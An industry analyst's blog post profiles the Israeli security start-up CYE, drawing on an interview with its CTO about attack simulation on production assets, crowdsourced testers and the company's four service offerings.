Predictive Security Analytics for Production Assets

A recent phenomenon in enterprise security is the increased emphasis on continuous execution of attack scenarios, usually based on frameworks such as MITRE ATT&CK. Dubbed breach and attack simulation by some analysts, and continuous control validation by others, the technique uses automation to demonstrate that targeted security controls are either working as expected or allowing exploits to proceed unchecked.

Another recent phenomenon in enterprise security is the growth in vetted communities of hackers, organized to provide continuous execution of attack scenarios. Dubbed bug bounty by some analysts, and crowdsourced security testing by others, the technique uses the collective creativity of experts to find weaknesses in target infrastructure. This approach gives enterprise teams comfort that weaknesses are being discovered.

Yet another recent phenomenon in enterprise security involves the use of machine learning and related advanced analytics to detect previously unseen exploits. This process employs ingest of malware or attack samples into a processing engine to enable detection of similar exploits. Such advanced analytics complement traditional signature-based and behavioral approaches to improve security accuracy and reduce false positives.

This past week, the TAG Cyber analysts met with one of our industry’s great experts – Ronen Lago, who serves as CTO of Israel-based start-up CYE. Ronen has an impressive resume, having spent time working complex security issues at Lockheed Martin and Daimler AG – so we were keen to hear from him. Interestingly, we learned that CYE addresses each of the evolving enterprise security approaches mentioned above. Here is what I learned:

“At CYE, we focus on helping organizations determine their threat posture,” he explained. “We do this by targeting their business-critical production assets mimicking realistic attack scenarios launched from the perspective of the external hacker. We then work with these targeted enterprise teams to provide a thorough assessment using our analytic tools, combined with the assistance of vetted expert security testers.”

I asked Lago about the decision at CYE to target actual production systems with the security tests, citing the more common approach we see at TAG Cyber where vendors will simulate the attacks adjacent to live infrastructure: “That is the power of our solution,” he replied. “We give a realistic view of the true risks to production systems that exist within the enterprise. It results in the most accurate measure of security posture.”

The use of vetted security testers also seemed a unique aspect of this solution – one that introduced the power of crowdsourcing to the overall approach. Lago explained: “We rely on our vetted security experts to help us provide details of attacks to common systems, services, and applications, which we can then relay to our customers. Obviously, we manage and compensate this vetted team.”

The premium cyber security services from CYE are packaged into four different offerings: They include continuous security assessment (using the technical approach outlined above), risk mitigation and strategic advisory services, supply chain risk assessment, and crisis management and incident response. These four offerings combine automated platform support with professional services from CYE experts.

I asked Lago about the challenges of combining platform support with consulting and we both agreed on the pros and cons: “Our customers benefit from the combination of platform and professional services” he said, “but we also understand the importance of scaling our automation to grow the business. We are working hard to develop and support the right balance between the two.”

Like all cyber security industry analysts, our TAG Cyber team feels the pull to report on vendors who fit neatly into a category. Such tidy coverage is much simpler than the alternative, and usually results in analyst guidance the matches the expectation of a reader. Covering a next-generation firewall or network access control vendor is straightforward, and doesn’t require a lot of pre-work to explain what’s being done.

But with vendors like CYE, who stretch their solution across multiple categories, including BAS, bug bounty, scanning, penetration testing, security analytics, risk scoring, and more, the analyst coverage is more difficult, but also more interesting. A similar situation exists for enterprise buyers, who might have to be creative to combine categories to select and purchase interesting tools like from CYE.

My advice is that you contact Ronen Lago and his fine team at CYE and ask to hear the story. It’s fascinating to see how they’ve woven so many different types of controls into one commercial offering – and it’s great to hear the story from an expert with a background as rich as Lago’s. As always, please be sure to share back with us what you learn – and during these tough times across the world, please be safe and healthy.

We look forward to hearing from you.